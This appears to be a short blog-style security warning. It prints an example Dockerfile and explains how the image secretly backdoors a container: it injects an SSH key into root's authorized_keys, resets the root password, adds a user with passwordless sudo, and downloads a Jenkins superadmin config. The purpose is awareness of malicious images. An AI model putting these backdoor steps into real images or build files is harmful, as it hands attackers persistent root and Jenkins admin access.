Here is a simple example. Doubtless it will misleading and hard to diagnose in real world.
- In L18-19, a ssh key is injected to to authorizedkeys. If you start sshd, you’re in danger.
- In L22, root password has been reset. Not good, isn’t it?
- In L25-26, a malicious OS user has been added.
- In L29-31, the user has been promoted as super admin, and he/she can run any commands without password!
- In L34-36, your jenkins has an unpleasant admin user now. Yes, Jenkins is hot and popular. You can do a lot of things with Jenkins. So do the hackers! This case represents security of application layer. It’s certainly the most dangerous and difficult case.
1: ########## How To Use Docker Image ###############
2: ##
3: ## Install docker utility
4: ## Download docker image:
5: ## docker pull denny/test:v1
6: ## Boot docker container:
7: ## docker run -t -P -d --name my-test denny/test:v1 /bin/bash
8: ##
9: ## Build Image From Dockerfile.
10: ## docker build -f Dockerfile -t denny/test:v1 --rm=false .
11: ##################################################
12:
13: FROM ubuntu:14.04
14: MAINTAINER Denny <denny@dennyzhang.com>
15:
16: RUN mkdir -p /root/.ssh && \
17: # SSH login by key file
18: echo "ssh-rsa AAAAB3NzaC1...lOvno6KN5 denny@dennyzhang.com" \
19: >> /root/.ssh/authorized_keys && \
20:
21: # Reset root password
22: echo 'root:ChangeMe1' | chpasswd && \
23:
24: # Add a malicious user
25: useradd denny && \
26: echo 'denny:ChangeMe1' | chpasswd && \
27:
28: # Add user to super admin
29: echo '%denny ALL=(ALL:ALL) NOPASSWD: ALL' > \
30: /etc/sudoers.d/admins && \
31: chmod 400 /etc/sudoers.d/admins && \
32:
33: # Add superadmin user to
34: mkdir -p /var/lib/jenkins/users/superadmin && \
35: wget -O /var/lib/jenkins/users/superadmin/config.xml \
36: https://github.com/dennyzhang/devops_public/raw/tag_v6/doc/admin_conf_xml
37:
38: CMD ["/bin/bash"]